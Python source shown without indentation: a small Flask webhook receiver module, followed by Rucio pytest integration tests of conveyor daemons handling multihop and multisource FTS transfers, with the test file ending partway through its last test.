# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import sys
from threading import Thread
from time import sleep
from typing import Callable, Optional, Tuple
from flask import Flask, request
from werkzeug.datastructures import EnvironHeaders
from .util import get_random_local_port
RANDOM_PORT_RETRY_MAX = 10
os.environ['WERKZEUG_RUN_MAIN'] = 'true' # eliminate werkzeug server banner on boot
logging.getLogger('werkzeug').disabled = True
class WebhookReceiver():
def __init__(self, address: str, port: int,
callback: Optional[Callable[[EnvironHeaders, str], None]] = None) -> None:
assert port >= 0
self.address: str = address
self.port: int = port
self.callback: Callable[[EnvironHeaders, str],
None] = callback if callback else self.resolve_request
self.thread: Optional[Thread] = None
def start(self) -> Tuple[str, int]:
if self.thread:
raise Exception('Already running')
self.thread = Thread(target=self.boot_server, daemon=True)
self.thread.start()
sleep(1)
assert self.thread
assert self.thread.is_alive()
return self.address, self.port
def boot_server(self) -> None:
app = Flask(self.__class__.__name__)
app.add_url_rule('/', 'post_callback', self._data_dispatcher, methods=['POST'])
if self.port > 0:
app.run(self.address, self.port)
return
retry = RANDOM_PORT_RETRY_MAX
while True:
try:
self.port = get_random_local_port()
app.run(self.address, self.port)
except OSError as err:
if err.errno == 98: # Address already in use
retry -= 1
if retry > 0:
continue
raise Exception('Cannot get unused port') from err
break
self.thread = None
def _data_dispatcher(self) -> str:
headers = request.headers
body = request.get_data(cache=False, as_text=True) # XXX: should decode as text?
Thread(target=self.callback, args=[headers, body], daemon=True).start()
return 'ok'
def resolve_request(self, headers: EnvironHeaders, body: str) -> None:
print(self)
print(headers)
print('--')
print(body)
def main(listen_address: str, listen_port: str):
try:
webhook = WebhookReceiver(listen_address, int(listen_port))
address, port = webhook.start()
pid = os.getpid()
print(f'{pid}\t{address}\t{port}')
assert webhook.thread
webhook.thread.join()
except KeyboardInterrupt:
print('caught SIGINT.')
if __name__ == '__main__':
main(sys.argv[1], sys.argv[2])
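# Minimal usage sketch (an assumption for illustration, not part of the original module):
# start a receiver on a random free local port and handle each POST body with a custom
# callback; the callback name below is hypothetical.
#
#   def on_webhook(headers, body):
#       print(headers.get('Content-Type'), body)
#
#   receiver = WebhookReceiver('127.0.0.1', 0, callback=on_webhook)
#   address, port = receiver.start()  # port 0 makes boot_server() pick a random local port
#   receiver.thread.join()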
|
test_conveyor.py
|
# -*- coding: utf-8 -*-
# Copyright 2015-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Wen Guan <wen.guan@cern.ch>, 2015-2016
# - Vincent Garonne <vincent.garonne@cern.ch>, 2016
# - Martin Barisits <martin.barisits@cern.ch>, 2019-2022
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Mayank Sharma <imptodefeat@gmail.com>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
import threading
import time
from datetime import datetime, timedelta
from unittest.mock import patch
from urllib.parse import urlencode, urlparse, parse_qsl, urlunparse
import pytest
import rucio.daemons.reaper.reaper
from rucio.common.types import InternalAccount
from rucio.common.utils import generate_uuid
from rucio.common.exception import ReplicaNotFound, RequestNotFound
from rucio.core import config as core_config
from rucio.core import distance as distance_core
from rucio.core import replica as replica_core
from rucio.core import request as request_core
from rucio.core import rse as rse_core
from rucio.core import rule as rule_core
from rucio.daemons.conveyor.finisher import finisher
from rucio.daemons.conveyor.poller import poller
from rucio.daemons.conveyor.preparer import preparer
from rucio.daemons.conveyor.submitter import submitter
from rucio.daemons.conveyor.stager import stager
from rucio.daemons.conveyor.throttler import throttler
from rucio.daemons.conveyor.receiver import receiver, graceful_stop as receiver_graceful_stop
from rucio.daemons.reaper.reaper import reaper
from rucio.db.sqla import models
from rucio.db.sqla.constants import RequestState, RequestType, ReplicaState, RSEType
from rucio.db.sqla.session import read_session, transactional_session
from rucio.tests.common import skip_rse_tests_with_accounts
from rucio.transfertool.fts3 import FTS3Transfertool
MAX_POLL_WAIT_SECONDS = 60
TEST_FTS_HOST = 'https://fts:8446'
def __wait_for_replica_transfer(dst_rse_id, scope, name, state=ReplicaState.AVAILABLE, max_wait_seconds=MAX_POLL_WAIT_SECONDS):
"""
Wait for the replica to become AVAILABLE on the given RSE as a result of a pending transfer
"""
replica = None
for _ in range(max_wait_seconds):
poller(once=True, older_than=0, partition_wait_time=None)
finisher(once=True, partition_wait_time=None)
replica = replica_core.get_replica(rse_id=dst_rse_id, scope=scope, name=name)
if replica['state'] == state:
break
time.sleep(1)
return replica
def __wait_for_request_state(dst_rse_id, scope, name, state, max_wait_seconds=MAX_POLL_WAIT_SECONDS, run_poller=True):
"""
Wait for the request state to be updated to the given expected state as a result of a pending transfer
"""
request = None
for _ in range(max_wait_seconds):
if run_poller:
poller(once=True, older_than=0, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id, scope=scope, name=name)
if request['state'] == state:
break
time.sleep(1)
return request
def __wait_for_fts_state(request, expected_state, max_wait_seconds=MAX_POLL_WAIT_SECONDS):
job_state = ''
for _ in range(max_wait_seconds):
fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query(request['external_id'])
job_state = fts_response[request['external_id']][request['id']]['job_state']
if job_state == expected_state:
break
time.sleep(1)
return job_state
def set_query_parameters(url, params):
"""
Set a query parameter in an url which may, or may not, have other existing query parameters
"""
url_parts = list(urlparse(url))
query = dict(parse_qsl(url_parts[4]))
query.update(params)
url_parts[4] = urlencode(query)
return urlunparse(url_parts)
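# Illustrative example (not executed by the tests; added for clarity): the given parameters
# are merged into any existing query string, e.g.
#   set_query_parameters('https://fts:8446/jobs?verbose=1', {'time_out': '120'})
#   -> 'https://fts:8446/jobs?verbose=1&time_out=120'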
@read_session
def __get_source(request_id, src_rse_id, scope, name, session=None):
return session.query(models.Source) \
.filter(models.Source.request_id == request_id) \
.filter(models.Source.scope == scope) \
.filter(models.Source.name == name) \
.filter(models.Source.rse_id == src_rse_id) \
.first()
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher; changes XRD3 usage and limits")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
('transfers', 'multihop_tombstone_delay', -1), # Set OBSOLETE tombstone for intermediate replicas
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
'rucio.daemons.reaper.reaper.REGION',
]}], indirect=True)
@pytest.mark.parametrize("file_config_mock", [
# Run test twice: with, and without, temp tables
{
"overrides": [
('core', 'use_temp_tables', 'True'),
]
},
{
"overrides": [
('core', 'use_temp_tables', 'False'),
]
}
], indirect=True)
def test_multihop_intermediate_replica_lifecycle(vo, did_factory, root_account, core_config_mock, caches_mock, metrics_mock, file_config_mock):
"""
Ensure that intermediate replicas created by the submitter are protected from deletion even if their tombstone is
set to epoch.
After successful transfers, intermediate replicas with default (epoch) tombstone must be removed. The others must
be left intact.
"""
src_rse1_name = 'XRD1'
src_rse1_id = rse_core.get_rse_id(rse=src_rse1_name, vo=vo)
src_rse2_name = 'XRD2'
src_rse2_id = rse_core.get_rse_id(rse=src_rse2_name, vo=vo)
jump_rse_name = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse_name, vo=vo)
dst_rse_name = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse_name, vo=vo)
all_rses = [src_rse1_id, src_rse2_id, jump_rse_id, dst_rse_id]
did = did_factory.upload_test_file(src_rse1_name)
# Copy the replica to a second source. This avoids the special case of a unique last replica, which could be handled in a special (more careful) way
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=src_rse2_name, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], partition_wait_time=None, transfertype='single', filter_transfertool=None)
replica = __wait_for_replica_transfer(dst_rse_id=src_rse2_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
rse_core.set_rse_limits(rse_id=jump_rse_id, name='MinFreeSpace', value=1)
rse_core.set_rse_usage(rse_id=jump_rse_id, source='storage', used=1, free=0)
try:
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse_name, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
# Submit transfers to FTS
# Ensure a replica was created on the intermediary host with epoch tombstone
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=jump_rse_id, **did)
assert request['state'] == RequestState.SUBMITTED
replica = replica_core.get_replica(rse_id=jump_rse_id, **did)
assert replica['tombstone'] == datetime(year=1970, month=1, day=1)
assert replica['state'] == ReplicaState.COPYING
# The intermediate replica is protected by its state (Copying)
rucio.daemons.reaper.reaper.REGION.invalidate()
reaper(once=True, rses=[], include_rses=jump_rse_name, exclude_rses=None)
replica = replica_core.get_replica(rse_id=jump_rse_id, **did)
assert replica['state'] == ReplicaState.COPYING
# Wait for the intermediate replica to become ready
replica = __wait_for_replica_transfer(dst_rse_id=jump_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
# The intermediate replica is protected by an entry in the sources table
# Reaper must not remove this replica, even if it has an obsolete tombstone
rucio.daemons.reaper.reaper.REGION.invalidate()
reaper(once=True, rses=[], include_rses=jump_rse_name, exclude_rses=None)
replica = replica_core.get_replica(rse_id=jump_rse_id, **did)
assert replica
# FTS fails the second transfer
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, **did)
# Call finisher once to update the source rankings
finisher(once=True, partition_wait_time=None)
# ensure that the ranking was correctly decreased
assert __get_source(request_id=request['id'], src_rse_id=jump_rse_id, **did).ranking == -1
# run submitter again to copy from jump rse to destination rse
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Wait for the destination replica to become ready
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did, max_wait_seconds=120)
assert replica['state'] == ReplicaState.AVAILABLE
rucio.daemons.reaper.reaper.REGION.invalidate()
reaper(once=True, rses=[], include_rses='test_container_xrd=True', exclude_rses=None)
with pytest.raises(ReplicaNotFound):
replica_core.get_replica(rse_id=jump_rse_id, **did)
# 4 requests: copy to second source + 1 multihop with two hops (but second hop fails) + re-scheduled second hop
# Use inequalities, because there can be left-overs from other tests
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 4
assert metrics_mock.get_sample_value('rucio_core_request_submit_transfer_total') >= 4
# at least the failed hop
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_finisher_handle_requests_total') > 0
finally:
@transactional_session
def _cleanup_all_usage_and_limits(rse_id, session=None):
session.query(models.RSELimit).filter_by(rse_id=rse_id).delete()
session.query(models.RSEUsage).filter_by(rse_id=rse_id, source='storage').delete()
_cleanup_all_usage_and_limits(rse_id=jump_rse_id)
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_fts_non_recoverable_failures_handled_on_multihop(vo, did_factory, root_account, replica_client, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the poller correctly handles non-recoverable FTS job failures
"""
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
# Register a did which doesn't exist. It will trigger a non-recoverable error during the FTS transfer.
did = did_factory.random_did()
replica_client.add_replicas(rse=src_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, **did)
assert 'Unused hop in multi-hop' in request['err_msg']
assert request['state'] == RequestState.FAILED
request = request_core.get_request_by_did(rse_id=jump_rse_id, **did)
assert request['state'] == RequestState.FAILED
assert request['attributes']['source_replica_expression'] == src_rse
# Each hop is a separate transfer, which will be handled by the poller and marked as failed
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 2
finisher(once=True, partition_wait_time=None)
# The intermediate request must not be re-scheduled by finisher
with pytest.raises(RequestNotFound):
request_core.get_request_by_did(rse_id=jump_rse_id, **did)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
# ensure that the ranking was correctly decreased for the whole path
assert __get_source(request_id=request['id'], src_rse_id=jump_rse_id, **did).ranking == -1
assert __get_source(request_id=request['id'], src_rse_id=src_rse_id, **did).ranking == -1
assert request['state'] == RequestState.QUEUED
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_fts_recoverable_failures_handled_on_multihop(vo, did_factory, root_account, replica_client, file_factory, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the poller correctly handles recoverable FTS job failures
"""
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
# Create and upload a real file, but register it with wrong checksum. This will trigger
# a FTS "Recoverable" failure on checksum validation
local_file = file_factory.file_generator()
did = did_factory.random_did()
did_factory.upload_client.upload(
[
{
'path': local_file,
'rse': src_rse,
'did_scope': did['scope'].external,
'did_name': did['name'],
'no_register': True,
}
]
)
replica_client.add_replicas(rse=src_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, **did)
assert request['state'] == RequestState.FAILED
request = request_core.get_request_by_did(rse_id=jump_rse_id, **did)
assert request['state'] == RequestState.FAILED
# Each hop is a separate transfer, which will be handled by the poller and marked as failed
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 2
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_multisource(vo, did_factory, root_account, replica_client, core_config_mock, caches_mock, metrics_mock):
src_rse1 = 'XRD4'
src_rse1_id = rse_core.get_rse_id(rse=src_rse1, vo=vo)
src_rse2 = 'XRD1'
src_rse2_id = rse_core.get_rse_id(rse=src_rse2, vo=vo)
dst_rse = 'XRD3'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse1_id, src_rse2_id, dst_rse_id]
# Add a good replica on the RSE which has a higher distance ranking
did = did_factory.upload_test_file(src_rse1)
# Add a non-existing replica which will fail during multisource transfers on the RSE with lower cost (will be the preferred source)
replica_client.add_replicas(rse=src_rse2, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
@read_session
def __source_exists(src_rse_id, scope, name, session=None):
return session.query(models.Source) \
.filter(models.Source.rse_id == src_rse_id) \
.filter(models.Source.scope == scope) \
.filter(models.Source.name == name) \
.count() != 0
# Entries in the source table must be created for both sources of the multi-source transfer
assert __source_exists(src_rse_id=src_rse1_id, **did)
assert __source_exists(src_rse_id=src_rse2_id, **did)
# After submission, the source rse is the one which will fail
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
assert request['source_rse'] == src_rse2
assert request['source_rse_id'] == src_rse2_id
# The source_rse must be updated to the correct one
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.DONE, **did)
assert request['source_rse'] == src_rse1
assert request['source_rse_id'] == src_rse1_id
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
# Both entries in source table must be removed after completion
assert not __source_exists(src_rse_id=src_rse1_id, **did)
assert not __source_exists(src_rse_id=src_rse2_id, **did)
# Only one request was handled; doesn't matter that it's multisource
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_finisher_handle_requests_total') >= 1
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 1
assert metrics_mock.get_sample_value(
'rucio_core_request_get_next_total',
labels={
'request_type': 'TRANSFER.STAGEIN.STAGEOUT',
'state': 'DONE.FAILED.LOST.SUBMITTING.SUBMISSION_FAILED.NO_SOURCES.ONLY_TAPE_SOURCES.MISMATCH_SCHEME'}
)
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter and receiver")
def test_multisource_receiver(vo, did_factory, replica_client, root_account, metrics_mock):
"""
Run receiver as a background thread to automatically handle fts notifications.
Ensure that a multi-source job in which the first source fails is correctly handled by receiver.
"""
receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'full_mode': True, 'all_vos': True, 'total_threads': 1})
receiver_thread.start()
try:
src_rse1 = 'XRD4'
src_rse1_id = rse_core.get_rse_id(rse=src_rse1, vo=vo)
src_rse2 = 'XRD1'
src_rse2_id = rse_core.get_rse_id(rse=src_rse2, vo=vo)
dst_rse = 'XRD3'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse1_id, src_rse2_id, dst_rse_id]
# Add a good replica on the RSE which has a higher distance ranking
did = did_factory.upload_test_file(src_rse1)
# Add a non-existing replica which will fail during multisource transfers on the RSE with lower cost (will be the preferred source)
replica_client.add_replicas(rse=src_rse2, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# After submission, the source rse is the one which will fail
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
assert request['source_rse'] == src_rse2
assert request['source_rse_id'] == src_rse2_id
request = None
for _ in range(MAX_POLL_WAIT_SECONDS):
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
# The request must not be marked as failed. Not even temporarily. It is a multi-source transfer and
# the first, failed, source must not change the replica state. We must wait for all sources to be tried.
assert request['state'] != RequestState.FAILED
if request['state'] == RequestState.DONE:
break
time.sleep(1)
assert request['state'] == RequestState.DONE
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 1
# The source was updated to the good one
assert request['source_rse'] == src_rse1
assert request['source_rse_id'] == src_rse1_id
finally:
receiver_graceful_stop.set()
receiver_thread.join(timeout=5)
receiver_graceful_stop.clear()
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter and receiver")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_multihop_receiver_on_failure(vo, did_factory, replica_client, root_account, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the receiver correctly handles multihop jobs which fail
"""
receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'full_mode': True, 'all_vos': True, 'total_threads': 1})
receiver_thread.start()
try:
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
# Register a did which doesn't exist. It will trigger a failure during the FTS transfer.
did = did_factory.random_did()
replica_client.add_replicas(rse=src_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=jump_rse_id, state=RequestState.FAILED, run_poller=False, **did)
assert request['state'] == RequestState.FAILED
# We use FTS "Completion" messages in receiver. In case of multi-hops transfer failures, FTS doesn't start
# next transfers; so it never sends a "completion" message for some hops. Rely on poller in such cases.
# TODO: set the run_poller argument to False if we ever manage to make the receiver correctly handle multi-hop failures.
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, run_poller=True, **did)
assert request['state'] == RequestState.FAILED
assert 'Unused hop in multi-hop' in request['err_msg']
# First hop will be handled by receiver; second hop by poller
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 1
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 1
finisher(once=True, partition_wait_time=None)
# The intermediate request must not be re-scheduled by finisher
with pytest.raises(RequestNotFound):
request_core.get_request_by_did(rse_id=jump_rse_id, **did)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
# ensure that the ranking was correctly decreased for the whole path
assert __get_source(request_id=request['id'], src_rse_id=jump_rse_id, **did).ranking == -1
assert __get_source(request_id=request['id'], src_rse_id=src_rse_id, **did).ranking == -1
assert request['state'] == RequestState.QUEUED
finally:
receiver_graceful_stop.set()
receiver_thread.join(timeout=5)
receiver_graceful_stop.clear()
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter and receiver")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_multihop_receiver_on_success(vo, did_factory, root_account, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the receiver correctly handles successful multihop jobs
"""
receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'full_mode': True, 'all_vos': True, 'total_threads': 1})
receiver_thread.start()
try:
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
did = did_factory.upload_test_file(src_rse)
rule_priority = 5
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None, priority=rule_priority)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=jump_rse_id, state=RequestState.DONE, run_poller=False, **did)
assert request['state'] == RequestState.DONE
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.DONE, run_poller=False, **did)
assert request['state'] == RequestState.DONE
fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query(request['external_id'])
assert fts_response[request['external_id']][request['id']]['priority'] == rule_priority
# Two hops; both handled by receiver
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 2
finally:
receiver_graceful_stop.set()
receiver_thread.join(timeout=5)
receiver_graceful_stop.clear()
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs multiple conveyor daemons")
@pytest.mark.parametrize("file_config_mock", [{
"overrides": [('conveyor', 'use_preparer', 'true')]
}], indirect=True)
@pytest.mark.parametrize("core_config_mock", [{
"table_content": [('throttler', 'mode', 'DEST_PER_ALL_ACT')]
}], indirect=True)
def test_preparer_throttler_submitter(rse_factory, did_factory, root_account, file_config_mock, core_config_mock, metrics_mock):
"""
Integration test of the preparer/throttler workflow.
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse1, dst_rse_id1 = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse2, dst_rse_id2 = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id1, dst_rse_id2]
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
distance_core.add_distance(src_rse_id, dst_rse_id1, ranking=10)
distance_core.add_distance(src_rse_id, dst_rse_id2, ranking=10)
# Set limits only for one of the RSEs
rse_core.set_rse_transfer_limits(dst_rse_id1, max_transfers=1, activity='all_activities', strategy='fifo')
did1 = did_factory.upload_test_file(src_rse)
did2 = did_factory.upload_test_file(src_rse)
rule_core.add_rule(dids=[did1], account=root_account, copies=1, rse_expression=dst_rse1, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
rule_core.add_rule(dids=[did2], account=root_account, copies=1, rse_expression=dst_rse1, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
rule_core.add_rule(dids=[did1], account=root_account, copies=1, rse_expression=dst_rse2, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did1)
assert request['state'] == RequestState.PREPARING
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did2)
assert request['state'] == RequestState.PREPARING
request = request_core.get_request_by_did(rse_id=dst_rse_id2, **did1)
assert request['state'] == RequestState.PREPARING
# submitter must not work on PREPARING replicas
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
    # One RSE has limits set: its requests will be moved to WAITING state; the other RSE has no limits: its requests go directly to QUEUED
preparer(once=True, sleep_time=1, bulk=100, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did1)
assert request['state'] == RequestState.WAITING
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did2)
assert request['state'] == RequestState.WAITING
request = request_core.get_request_by_did(rse_id=dst_rse_id2, **did1)
assert request['state'] == RequestState.QUEUED
# submitter must not work on WAITING replicas
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# One of the waiting requests will be queued, the second will remain in waiting state
throttler(once=True, partition_wait_time=None)
